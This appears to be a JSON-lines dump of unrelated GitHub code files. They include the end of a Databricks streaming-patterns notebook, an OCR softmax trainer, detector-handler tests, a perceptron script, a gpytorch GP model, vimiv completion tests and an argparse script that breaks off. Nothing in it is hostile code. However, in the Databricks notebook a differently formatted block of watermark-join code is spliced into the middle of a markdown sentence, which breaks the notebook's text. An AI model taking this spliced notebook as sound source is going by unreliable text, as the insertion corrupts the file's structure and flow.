microBatchDF._jdf.sparkSession().sql(query)\n \ndef streaming_merge():\n spark.readStream.table(\"bronze_status\").writeStream.foreachBatch(upsert_cdc).option(\"checkpointLocation\", silverStatusCheckpoint).outputMode(\"update\").trigger(once=True).start()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC As always, we incrementally process newly arriving records.\n\n# COMMAND ----------\n\nstreaming_merge()\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_status\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Inserting new records will allow us to then apply these changes to our silver data.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO bronze_status\n# MAGIC VALUES (1, \"repeat\", \"update\", current_timestamp()),\n# MAGIC (2, \"at risk\", \"update\", current_timestamp()),\n# MAGIC (3, \"churned\", \"update\", current_timestamp()),\n# MAGIC (4, null, \"delete\", current_timestamp()),\n# MAGIC (6, \"new\", \"insert\", current_timestamp())\n\n# COMMAND ----------\n\nstreaming_merge()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that at present, the logic would not be particularly robust to data arriving out-of-order or duplicate records (but these occurences can be handled).\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_status\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Joining Two Incremental Tables\n# MAGIC \n# MAGIC Note that there are many intricacies around watermarking and windows when dealing with incremental joins, and that not all join types are supported.\n\n# COMMAND ----------\n\ndef stream_stream_join():\n nameDF = spark.readStream.table(\"silver_name\")\n valueDF = spark.readStream.table(\"silver_value\")\n \n (nameDF.join(valueDF, nameDF.id == valueDF.id, \"inner\")\n .select(nameDF.id, \n nameDF.name, \n valueDF.value, \n F.current_timestamp().alias(\"joined_timestamp\"))\n .writeStream\n .option(\"checkpointLocation\", joinedCheckpoint)\n .table(\"joined_streams\"))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that the logic defined above does not set a `trigger` option. This means that the stream will run in continuous execution mode, triggering every 500ms by default.\n\n# COMMAND ----------\n\nstream_stream_join()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Running `display()` on a streaming table read is a way to monitor table updates in near-real-time while in interactive development. 
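# COMMAND ----------

# MAGIC %md
# MAGIC A minimal sketch of the watermarking pattern mentioned above (the interval values
# MAGIC are illustrative; the `processed_time` columns written earlier serve as event time).
# MAGIC Watermarks bound how much state Spark must retain for a stream-stream join.

# COMMAND ----------

name_df = spark.readStream.table("silver_name").withWatermark("processed_time", "10 minutes")
value_df = spark.readStream.table("silver_value").withWatermark("processed_time", "10 minutes")

watermarked = name_df.alias("n").join(
    value_df.alias("v"),
    F.expr("""
        n.id = v.id AND
        v.processed_time BETWEEN n.processed_time - INTERVAL 5 MINUTES
                             AND n.processed_time + INTERVAL 5 MINUTES"""),
    "inner")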
Note that a separate stream is started.\n\n# COMMAND ----------\n\ndisplay(spark.readStream.table(\"joined_streams\"))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Here we'll add new values to the `bronze` table.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO bronze\n# MAGIC VALUES (10, \"Pedro\", 10.5),\n# MAGIC (11, \"Amelia\", 11.5),\n# MAGIC (12, \"Diya\", 12.3),\n# MAGIC (13, \"Li\", 13.4),\n# MAGIC (14, \"Daiyu\", 14.2),\n# MAGIC (15, \"Jacques\", 15.9)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The stream-stream join is configured against the tables resulting from the `split_stream` function; run this again and data should quickly process through the streaming join running above.\n\n# COMMAND ----------\n\nsplit_stream()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Interactive streams should always be stopped before leaving a notebook session, as they can keep clusters from timing out and incur unnecessary cloud costs.\n\n# COMMAND ----------\n\nfor stream in spark.streams.active:\n stream.stop()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Join Incremental and Static Data\n# MAGIC \n# MAGIC While incremental tables are ever-appending, static tables typically can be thought of as containing data that may be changed or overwritten.\n# MAGIC \n# MAGIC Because of Delta Lake's transactional guarantees and caching, Databricks ensures that each microbatch of streaming data that's joined back to a static table will contain the current version of data from the static table.\n\n# COMMAND ----------\n\nstatusDF = spark.read.table(\"silver_status\")\nbronzeDF = spark.readStream.table(\"bronze\")\n\nbronzeDF.alias(\"bronze\").join(statusDF.alias(\"status\"), bronzeDF.id==statusDF.user_id, \"inner\").select(\"bronze.*\", \"status.status\").writeStream.option(\"checkpointLocation\", joinStatusCheckpoint).table(\"joined_status\")\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM joined_status\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Only those records with a matching `id` in `joined_status` at the time the stream is processed will be represented in the resulting table.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_status\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Processing new records into the `silver_status` table will not automatically trigger updates to the results of the stream-static join.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO bronze_status\n# MAGIC VALUES (11, \"repeat\", \"update\", current_timestamp()),\n# MAGIC (12, \"at risk\", \"update\", current_timestamp()),\n# MAGIC (16, \"new\", \"insert\", current_timestamp()),\n# MAGIC (17, \"repeat\", \"update\", current_timestamp())\n\n# COMMAND ----------\n\nstreaming_merge()\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM joined_status\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Only new data appearing on the streaming side of the query will trigger records to process using this pattern.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO bronze\n# MAGIC VALUES (16, \"Marissa\", 1.9),\n# MAGIC (17, \"Anne\", 2.7)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The incremental data in a stream-static join \"drives\" the stream, guaranteeing that each microbatch of data joins with the current values present in the valid version of the static table.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM joined_status\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Stop Streaming Jobs\n\n# COMMAND 
----------\n\n# Stop Streaming Job\nfor stream in spark.streams.active:\n stream.stop()\n\n# COMMAND ----------\n\n# MAGIC %md-sandbox\n# MAGIC © 2022 Databricks, Inc. All rights reserved.<br/>
\n# MAGIC Apache, Apache Spark, Spark and the Spark logo are trademarks of the Apache Software Foundation.
\n# MAGIC
\n# MAGIC Privacy Policy | Terms of Use | Support\n","repo_name":"zubair527/advanced-data-engineering-with-databricks","sub_path":"Advanced-Data-Engineering-with-Databricks/01 - Architecting for the Lakehouse/ADE 1.04 - Streaming Design Patterns.py","file_name":"ADE 1.04 - Streaming Design Patterns.py","file_ext":"py","file_size_in_byte":18664,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"386451756","text":"import png\r\nimport numpy as np\r\nimport time\r\nimport math\r\nimport OCR_Preprocess as pre\r\nimport OCR_SVD as svd #Used since the testing algorithm is identical.\r\n#import OCR_IDX as idx\r\n\r\n#Builds a random prior for A and b by choosing a random order 1 number for each entry.\r\ndef randomPrior(xSize, ySize):\r\n\treturn np.random.randn(ySize, xSize), np.random.randn(ySize)\r\n\r\n\r\ndef buildMatrices(dataByFile, yData, reader, batchSize, stepSize, numSteps):\r\n\t\r\n\tXLength = reader.imageSize[0]*reader.imageSize[1]\r\n\tYLength = len(yData)\r\n\t\r\n\tA, b = randomPrior(XLength, YLength)\r\n\t\r\n\tcounter = 0\r\n\t\r\n\t#for batch in dataByFile.trainingBatch(batchSize):\r\n\tfor i in range(numSteps):\r\n\t\tbatch = dataByFile.getRandomTrainingPoints(batchSize)\r\n\t\r\n\t\tcounter = counter + 1\r\n\t\tif(counter % 1 == 0):\r\n\t\t\tprint(\"On batch number \" + str(counter))\r\n\t\t\r\n\t\tADiff = np.zeros(A.shape)\r\n\t\tbDiff = np.zeros(b.shape)\r\n\t\t\r\n\t\tfor token, filename in batch:\r\n\t\t\t\r\n\t\t\tcurrentXData = (reader.processedImage(filename)).flatten()\r\n\t\t\tcurrentYData = yData[token]\r\n\t\t\t\r\n\t\t\tyGuess = np.dot(A, currentXData) + b\r\n\t\t\tyGuessExp = np.exp(yGuess)\r\n\t\t\tZ = np.sum(yGuessExp)\r\n\t\t\t\r\n\t\t\t#print(yGuess)\r\n\t\t\tADiff = ADiff + np.outer(currentYData, currentXData) - np.outer(yGuessExp, currentXData)/Z\r\n\t\t\tbDiff = bDiff + currentYData - yGuessExp/Z\r\n\t\t\r\n\t\tnormalization = max(1.0, np.trace(np.dot(ADiff, ADiff.T)) + np.dot(bDiff,bDiff))\r\n\t\t\r\n\t\tADiff = ADiff/math.sqrt(normalization)\r\n\t\tbDiff = bDiff/math.sqrt(normalization)\r\n\t\t\r\n\t\tA = A + ADiff*stepSize\r\n\t\tb = b + bDiff*stepSize\r\n\t\t\r\n\treturn A,b \r\n\t\r\nif __name__ == \"__main__\":\r\n\tbaseDirectory = \"..\\\\NISTHandwritingDatabase\\\\by_class\"\r\n\tsubfolderPrefix = \"train_\"\r\n\ttypeTokens = ['30','31','32','33','34','35','36','37','38','39']\r\n\ttestFraction = 0.1\r\n\timageSize = [128,128]\r\n\tcroppingMargins = [32,32,32,32]\r\n\tmaxImagesPerChar = 0\r\n\tnumSteps = 1000\r\n\tbatchSize = 100\r\n\tstepSize = 0.5\r\n\tcoarseGrainFactor = 2\r\n\tnormalize = True\r\n\tinvert = True\r\n\tlogFilename = \"OCR_1Layer_log.txt\"\r\n\tweightsFilename = \"OCR_1Layer_Weights.npz\"\r\n\t\r\n\treader = pre.imageReader(imageSize, croppingMargins, coarseGrainFactor, normalize, invert)\r\n\t\r\n\t\r\n\ttimeStart = time.time()\r\n\r\n\tdataByFile = pre.dataSets(baseDirectory, subfolderPrefix, typeTokens, testFraction, maxImagesPerChar)\r\n\tyData = svd.buildYVectors(typeTokens)\r\n\r\n\t\r\n\tfileIndexCheckpoint = time.time()\r\n\tfileIndexTime = fileIndexCheckpoint - timeStart\r\n\t\r\n\t\r\n\tA, b = buildMatrices(dataByFile, yData, reader, batchSize, stepSize, numSteps)\r\n\t\r\n\ttrainingCheckpoint = time.time()\r\n\ttrainingTime = trainingCheckpoint - fileIndexCheckpoint\r\n\t\r\n\tpercentPassed, guessMatrix = svd.percentTestPassed(A, b, dataByFile, yData, reader)\r\n\t\r\n\ttimeEnd = time.time()\r\n\ttestingTime = timeEnd - trainingCheckpoint\r\n\ttotalTime = 
timeEnd - timeStart\r\n\t\r\n\tprint(\"Fraction passed: \" + str(percentPassed))\r\n\t\r\n\tnp.savez_compressed(weightsFilename, A=A, b=b)\r\n\t\r\n\tf = open(logFilename, 'w')\r\n\tf.write(\"Results for OCR performed using 1-layer softmax and gradient descent.\\n\")\r\n\tf.write(\"The weights determined by this run have been saved to: \" + weightsFilename + \"\\n\")\r\n\tf.write(\"Files loaded from: \" + dataByFile.directoryName('##') + \"\\n\")\r\n\tf.write(\"Character tokens used (## in the filename): \" + str(typeTokens)+\"\\n\")\r\n\tf.write(\"Margin cropping in pixels: Top: \" + str(croppingMargins[0]) + \" Bottom: \" + str(croppingMargins[1]) + \" Left: \" + str(croppingMargins[2]) + \" Right: \" + str(croppingMargins[3])+ \"\\n\")\r\n\tf.write(\"Coarse graining factor: \" + str(coarseGrainFactor)+ \"\\n\")\r\n\tf.write(\"Fraction of images randomly chosen for testing: \" + str(testFraction)+ \"\\n\")\r\n\tf.write(\"Max number of each character considered (randomly chosen): \" + (str(maxImagesPerChar)+ \"\\n\" if maxImagesPerChar > 0 else \"None\\n\"))\r\n\tf.write(\"\\n\")\r\n\tf.write(\"Total number of images trained: \" + str(dataByFile.numTrained)+ \"\\n\")\r\n\tf.write(\"Total number of images tested: \" + str(dataByFile.numTested)+ \"\\n\")\r\n\tf.write(\"Time indexing files: \" + str(fileIndexTime) + \"\\n\")\r\n\tf.write(\"Time training: \" + str(trainingTime) + \"\\n\")\r\n\tf.write(\"Time testing: \" + str(testingTime) + \"\\n\")\r\n\tf.write(\"Total time: \" + str(totalTime) + \"\\n\")\r\n\tf.write(\"\\n\")\r\n\tf.write(\"\\n\")\r\n\tf.write(\"Total fraction of tests passed: \" + str(percentPassed)+ \"\\n\")\r\n\tf.write(\"\\n\")\r\n\tf.write(\"\\n\")\r\n\tf.write(\"This is the prediction matrix. Provides the fraction of the time a given character was guessed to be a given other character.\\n\")\r\n\tf.write(\"Rows indicate actual values, columns the predicted values.\\n\")\r\n\tf.write(\"\\n\")\r\n\tf.write(\" |\")\r\n\tfor token in typeTokens:\r\n\t\tf.write(\" \" + str(token) + \" \") \r\n\tf.write(\"\\n\")\r\n\tf.write(\"----+\")\r\n\tfor token in typeTokens:\r\n\t\tf.write(\"--------\") \r\n\tf.write(\"\\n\")\t\r\n\tfor rowToken in typeTokens:\r\n\t\tf.write(\" \" + str(rowToken) + \" |\")\r\n\t\tfor columnToken in typeTokens:\r\n\t\t\tf.write(\" \" + \"{:6.4f}\".format(guessMatrix[(rowToken, columnToken)]) + \" \")\r\n\t\tf.write(\"\\n\")\r\n\t\r\n\t\r\n\tf.close()\t\r\n\t","repo_name":"ericmintun/miscellaneous","sub_path":"OCR/SelfImplementation/OCR_1Layer.py","file_name":"OCR_1Layer.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6739295480","text":"from area_detector_handlers.tests.conftest import select_handler\n\n\n@select_handler(\"XSP3_FLY\")\ndef test_bulk(xs3file, handler):\n (fname, kwargs), (N_points, N_chans, N_bin, N_roi) = xs3file\n\n with handler(fname, **kwargs) as h:\n assert h().shape == (N_points, N_chans, N_bin)\n assert h(target=\"data\").shape == (N_points, N_chans, N_bin)\n for chan in range(1, N_chans + 1):\n for roi in range(1, N_roi + 1):\n assert h(target=f\"CHAN{chan}ROI{roi}\").shape == (N_points,)\n assert h(target=f\"CHAN{chan}ROI{roi}HLM\").shape == (N_points,)\n assert h(target=f\"CHAN{chan}ROI{roi}LLM\").shape == (N_points,)\n\n assert h.get_file_list(()) == (fname,)\n\n\n@select_handler(\"XSP3\")\ndef test_pre_pixel(xs3file, handler):\n (fname, kwargs), (N_points, N_chans, N_bin, N_roi) = xs3file\n\n with handler(fname, 
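# A vectorized restatement (sketch) of the per-sample updates in buildMatrices
# above: summing outer(y, x) - outer(softmax(Ax + b), x) over a batch X (n x d)
# with one-hot targets Y (n x k) collapses to two matrix products.
import numpy as np

def softmax_log_likelihood_grad(A, b, X, Y):
    logits = X @ A.T + b                         # (n, k) class scores
    logits -= logits.max(axis=1, keepdims=True)  # stabilize exp()
    P = np.exp(logits)
    P /= P.sum(axis=1, keepdims=True)            # predicted probabilities
    return (Y - P).T @ X, (Y - P).sum(axis=0)    # gradients (dA, db)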
**kwargs) as h:\n for frame in range(0, N_points):\n for chan in range(1, N_chans + 1):\n assert h(frame=frame, channel=chan).shape == (N_bin,)\n assert h.get_file_list(()) == (fname,)\n","repo_name":"bluesky/area-detector-handlers","sub_path":"area_detector_handlers/tests/test_xs3.py","file_name":"test_xs3.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"29126465469","text":"############################# MY NEURAL NETWORK MODEL (TEST) #############################\n\nimport numpy as np # allows scientific computing \nimport pandas as pd # allows easy manipulation of data structures \nfrom train import NeuralNetwork # my very first Neural Network model\nfrom pandas import DataFrame as df \nimport matplotlib.pyplot as plt\n\nlearning_rate = 0.01\niterations = 100000\nloaded_model = NeuralNetwork(learning_rate, iterations)\n\ndf = pd.read_csv(\"basic_nn/train_data.csv\") # add train data\ntrain_data = df.drop([\"Species\"], axis = 1)\ntrain_results = df.Species\ntrain_data = np.array(train_data)\ntrain_results = np.array(train_results)\n\nnf = pd.read_csv(\"basic_nn/test_data.csv\") # add test data\ntest_data = nf.drop([\"Species\"], axis = 1)\ntest_results = nf.Species\ntest_data = np.array(test_data)\ntest_results = np.array(test_results)\n\n# test_errors, final_weights, final_bias = loaded_model.train(test_data, test_results, iterations)\n# print('final weights = ', final_weights)\n# print('final bias = ', final_bias)\n\n# the weight values found as a result are as follows:\n\nfinal_weights =[-0.21989351, -0.26251323, 0.46154674, 0.53166462]\nfinal_bias = 0.510874753594822\n\n############################# test data check ############################\n\ntest_data_pred = loaded_model.test_function(test_data, final_weights, final_bias)\nif (test_results == test_data_pred).all(): # every prediction must match its label\n print(\"The test results are Correct!\")\nelse:\n print(\"The test results are False!\")\n\n######################### new data prediction ###############################\n\nnew_data = list(map(float, input(\"\\n Enter the numbers: \").strip().split()))[:4] # keeps at most 4 values\n\nif len(new_data) < 4:\n print(\"You entered fewer than 4 features. Please provide exactly 4 feature values!\")\nelse:\n new_data_result = loaded_model.new_data_prediction(new_data, final_weights, final_bias)\n print(new_data_result)\n\n################################ error graph ####################################\n\n# test_errors, final_weights, final_bias = loaded_model.train(test_data, test_results, iterations)\n# plt.plot(test_errors)\n# plt.xlabel('iterations')\n# plt.ylabel('error for all the training instances')\n# plt.show()\n","repo_name":"sudeakinay/MLP-from-scratch","sub_path":"perceptron/perceptron-test.py","file_name":"perceptron-test.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"74922381866","text":"#!/usr/bin/env python\n\nimport os\nimport glob\nimport shutil\n\nList = next(os.walk('.'))[1] # Python 3: generators use the next() builtin\n\nfor files in List:\n with open(files + '/' + files +'_bulk.out') as f:\n for line in f:\n if 'Function evaluations' in line:\n niter = line.split()[2]\n list_calc = glob.glob(files + '/calcdir-*')\n for lc in list_calc:\n if niter not in lc:\n shutil.rmtree(lc)\n \n","repo_name":"mamunm/Bimetallic_Alloy_Codes","sub_path":"bulk_optimization/AB/fmin/delete_all_calcdir_except_last.py","file_name":"delete_all_calcdir_except_last.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"7574395218","text":"def mostfrequant(array):\n # array.sort()\n # max1 = 0\n # key = 0\n # for i in range(len(array)-1):\n # count = 0 \n # while array[i] == array[i+1]:\n # count+=1\n # i+=1\n # if count > max1:\n # max1 = count\n # key = array[i]\n # return key\n hashtable = {}\n\n for element in array:\n if element in hashtable:\n hashtable[element] += 1\n else:\n hashtable[element] = 1\n \n max1 = 0\n key1 = 0\n for key,value in hashtable.items():\n if value > max1:\n max1 = value\n key1 = key\n return key1\n\n\nprint(mostfrequant([1,2,3,1,1,4,2,2,3,3]))","repo_name":"aakash823/DSAlgo","sub_path":"practiceques/mostfrequantelement.py","file_name":"mostfrequantelement.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"34157887286","text":"'''\nModel for exact GP\nShall support multiple acquisition functions:\nUCB, TS, (q)EI.\n'''\nimport gpytorch\n\nclass ExactGPRegressionModel(gpytorch.models.ExactGP):\n def __init__(self, train_x, train_y, gp_likelihood, gp_feature_extractor, low_dim=True):\n '''\n Exact GP:\n Leave placeholder for gp_feature_extractor\n '''\n super(ExactGPRegressionModel, self).__init__(train_x, train_y, gp_likelihood)\n # self.mean_module = gpytorch.means.ZeroMean()\n if low_dim:\n self.covar_module = gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel())\n else:\n self.covar_module = gpytorch.kernels.LinearKernel(num_dims=train_x.size(-1))\n try: # gpytorch 1.6.0 support\n self.mean_module = gpytorch.means.ConstantMean(constant_prior=train_y.mean())\n except Exception: # gpytorch 1.9.1\n self.mean_module = gpytorch.means.ConstantMean()\n # self.covar_module = gpytorch.kernels.GridInterpolationKernel(\n # gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel(ard_num_dims=1)),\n # num_dims=train_x.size(-1), grid_size=1000)\n # self.covar_module = gpytorch.kernels.GridInterpolationKernel(\n # gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel(ard_num_dims=1),\n # outputscale_constraint=gpytorch.constraints.Interval(0.7,1.0)),\n # 
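# A minimal training-loop sketch for the ExactGPRegressionModel defined above,
# assuming a GaussianLikelihood; gp_feature_extractor is an unused placeholder
# in this model, so None is passed. The data here is illustrative only.
import torch
import gpytorch

train_x = torch.linspace(0, 1, 50).unsqueeze(-1)
train_y = torch.sin(6.28 * train_x).squeeze(-1)

likelihood = gpytorch.likelihoods.GaussianLikelihood()
model = ExactGPRegressionModel(train_x, train_y, likelihood, None, low_dim=True)

model.train()
likelihood.train()
optimizer = torch.optim.Adam(model.parameters(), lr=0.1)
mll = gpytorch.mlls.ExactMarginalLogLikelihood(likelihood, model)

for _ in range(50):
    optimizer.zero_grad()
    loss = -mll(model(train_x), train_y)  # negative marginal log likelihood
    loss.backward()
    optimizer.step()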
num_dims=train_x.size(-1), grid_size=100)\n\n # This module will scale the NN features so that they're nice values\n self.scale_to_bounds = gpytorch.utils.grid.ScaleToBounds(-1., 1.)\n\n def forward(self, x):\n # self.projected_x = x\n self.projected_x = self.scale_to_bounds(x) # Make the values \"nice\"\n\n mean_x = self.mean_module(self.projected_x)\n covar_x = self.covar_module(self.projected_x)\n return gpytorch.distributions.MultivariateNormal(mean_x, covar_x)","repo_name":"SchroDeCat/LLNL","sub_path":"src/models/exact_gp.py","file_name":"exact_gp.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2010114241","text":"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4\n\"\"\"Completion tests for vimiv's test suite.\"\"\"\n\nimport os\nimport shutil\nfrom unittest import main\n\nfrom vimiv.trash_manager import TrashManager\n\nfrom vimiv_testcase import VimivTestCase\n\n\nclass CompletionsTest(VimivTestCase):\n \"\"\"Completions Tests.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.init_test(cls)\n cls.completions = cls.vimiv[\"completions\"]\n\n def test_internal_completion(self):\n \"\"\"Completion of internal commands.\"\"\"\n self.vimiv[\"commandline\"].set_text(\":a\")\n self.completions.complete()\n expected_completions = [\"accept_changes\", \"alias\", \"autorotate\"]\n liststore = self.completions.get_model()\n for row in liststore:\n self.assertIn(row[0], expected_completions)\n self.assertEqual(len(liststore), len(expected_completions))\n # Internal completion with a prefixed digit\n self.vimiv[\"commandline\"].set_text(\":5a\")\n self.completions.complete()\n expected_completions = [\"accept_changes\", \"alias\", \"autorotate\"]\n liststore = self.completions.get_model()\n for row in liststore:\n self.assertIn(row[0], expected_completions)\n self.assertEqual(len(liststore), len(expected_completions))\n\n def test_external_completion(self):\n \"\"\"Completion of external commands. 
Currently none.\"\"\"\n self.vimiv[\"commandline\"].set_text(\":!vimi\")\n self.completions.complete()\n liststore = self.completions.get_model()\n self.assertFalse(len(liststore))\n\n def test_external_path_completion(self):\n \"\"\"Completion of paths for external commands.\"\"\"\n # One path\n self.vimiv[\"commandline\"].set_text(\":!mv vi\")\n expected_completions = [\"!mv vimiv/\"]\n liststore = self.completions.get_model()\n for row in liststore:\n self.assertIn(row[0], expected_completions)\n self.assertEqual(len(liststore), len(expected_completions))\n # Two paths\n self.vimiv[\"commandline\"].set_text(\":!mv % vi\")\n expected_completions = [\"!mv % vimiv/\"]\n liststore = self.completions.get_model()\n for row in liststore:\n self.assertIn(row[0], expected_completions)\n self.assertEqual(len(liststore), len(expected_completions))\n # Do not complete arguments\n self.vimiv[\"commandline\"].set_text(\":!mv -\")\n self.completions.complete()\n liststore = self.completions.get_model()\n self.assertFalse(len(liststore))\n\n def test_path_completion(self):\n \"\"\"Completion of paths.\"\"\"\n self.vimiv[\"commandline\"].set_text(\":./vimiv/testimages/ar\")\n self.completions.complete()\n expected_completions = [\"./vimiv/testimages/arch-logo.png\",\n \"./vimiv/testimages/arch_001.jpg\"]\n liststore = self.completions.get_model()\n for row in liststore:\n self.assertIn(row[0], expected_completions)\n self.assertEqual(len(liststore), len(expected_completions))\n # Expand home\n self.settings.override(\"show_hidden\", \"true\")\n self.vimiv[\"commandline\"].set_text(\":~/.loca\")\n liststore = self.completions.get_model()\n completions = []\n for row in liststore:\n completions.append(row[0])\n self.assertIn(\"~/.local/\", completions)\n self.settings.override(\"show_hidden\", \"false\")\n\n def test_tag_completion(self):\n \"\"\"Completion of tags.\"\"\"\n # Create one tag\n new_tagfile = os.path.join(self.vimiv[\"tags\"].directory, \"testfile\")\n with open(new_tagfile, \"w\") as f:\n f.write(os.path.abspath(\"vimiv/testimages/arch-logo.png\"))\n tagfiles = os.listdir(self.vimiv[\"tags\"].directory)\n self.vimiv[\"commandline\"].set_text(\":tag_load \")\n self.completions.complete()\n liststore = self.completions.get_model()\n expected_completions = [\"tag_load \" + tag for tag in tagfiles]\n for row in liststore:\n self.assertIn(row[0], expected_completions)\n self.assertEqual(len(liststore), len(expected_completions))\n\n def test_trash_completion(self):\n \"\"\"Completion of files in trash.\"\"\"\n # Create one image file in trash and one with a similar name but not an\n # image\n # The completion is supposed to be unique as the non-image is ignored\n trash_directory = TrashManager().get_files_directory()\n trashed_file = os.path.join(trash_directory, \"arch-logo.png\")\n shutil.copy(\"vimiv/testimages/arch-logo.png\", trash_directory)\n with open(os.path.join(trash_directory, \"arch-logo.txt\"), \"w\") as f:\n f.write(\"test\\n\")\n self.vimiv[\"commandline\"].set_text(\":undelete \")\n self.completions.complete()\n expected_text = \":undelete arch-logo.png\"\n self.assertEqual(expected_text, self.vimiv[\"commandline\"].get_text())\n # Clean up\n os.remove(trashed_file)\n\n def test_tabbing(self):\n \"\"\"Tabbing through completions.\"\"\"\n # Complete to last matching character\n self.vimiv[\"commandline\"].set_text(\":co\")\n self.completions.complete()\n expected_text = \":copy_\"\n received_text = self.vimiv[\"commandline\"].get_text()\n self.assertEqual(expected_text, 
received_text)\n # First result\n liststore = self.completions.get_model()\n self.vimiv[\"completions\"].complete()\n expected_text = \"copy_abspath\"\n selected_path = self.completions.get_cursor()[0]\n selected_index = selected_path.get_indices()[0]\n selected_text = liststore[selected_index][0]\n self.assertEqual(expected_text, selected_text)\n # Second result\n self.vimiv[\"completions\"].complete()\n expected_text = \"copy_basename\"\n selected_path = self.completions.get_cursor()[0]\n selected_index = selected_path.get_indices()[0]\n selected_text = liststore[selected_index][0]\n self.assertEqual(expected_text, selected_text)\n # First again\n self.vimiv[\"completions\"].complete(inverse=True)\n expected_text = \"copy_abspath\"\n selected_path = self.completions.get_cursor()[0]\n selected_index = selected_path.get_indices()[0]\n selected_text = liststore[selected_index][0]\n self.assertEqual(expected_text, selected_text)\n # Now activate the completion\n self.completions.emit(\"row-activated\",\n self.completions.get_cursor()[0], None)\n entry_text = self.vimiv[\"commandline\"].get_text()\n expected_text = \":copy_abspath\"\n self.assertEqual(expected_text, entry_text)\n\n def test_best_match_with_prefix(self):\n \"\"\"Complete to best match with a prefixed number.\"\"\"\n # Complete to last matching character\n self.vimiv[\"commandline\"].set_text(\":2co\")\n self.completions.complete()\n expected_text = \":2copy_\"\n received_text = self.vimiv[\"commandline\"].get_text()\n self.assertEqual(expected_text, received_text)\n\n def test_selections(self):\n \"\"\"Initial selection when tabbing through completions.\"\"\"\n self.vimiv[\"commandline\"].enter()\n # No cursor yet\n cursor = self.completions.get_cursor()[0]\n self.assertIsNone(cursor)\n # Tab should start at index 0\n self.completions.complete()\n cursor = self.completions.get_cursor()[0]\n self.assertIsNotNone(cursor)\n index = cursor.get_indices()[0]\n self.assertEqual(index, 0)\n # Re-open the completion\n self.completions.hide()\n self.completions.reset()\n self.vimiv[\"commandline\"].set_text(\":\")\n self.completions.show()\n # No cursor again\n cursor = self.completions.get_cursor()[0]\n self.assertIsNone(cursor)\n # Inverse Tab should start at index -1\n self.completions.complete(True)\n cursor = self.completions.get_cursor()[0]\n self.assertIsNotNone(cursor)\n index = cursor.get_indices()[0]\n last = len(self.completions.get_model()) - 1\n self.assertEqual(index, last)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"karlch/vimiv","sub_path":"tests/completions_test.py","file_name":"completions_test.py","file_ext":"py","file_size_in_byte":8191,"program_lang":"python","lang":"en","doc_type":"code","stars":259,"dataset":"github-code","pt":"37"} +{"seq_id":"28720705961","text":"import os\r\nimport argparse\r\nimport torch\r\nfrom data import ScrewholeDataset\r\nfrom torch.utils.data import DataLoader\r\nfrom utils import *\r\nfrom train import train_1, train_2\r\nfrom test import *\r\n\r\ndef argparser(parser):\r\n #parser.add_argument('--image_path', default='.\\\\test_images', type=str)\r\n parser.add_argument('--image_path', default='.\\\\train_images\\\\withBG', type=str)\r\n parser.add_argument('--start_epoch', default=0, type=int)\r\n parser.add_argument('--num_class_1', default=4, type=int)\r\n parser.add_argument('--num_class_2', default=1, type=int)\r\n parser.add_argument('--resume_1', default=\".\\\\weights_1\\\\checkpoint_17.pth\", type=str)\r\n parser.add_argument('--resume_2', default=None, 
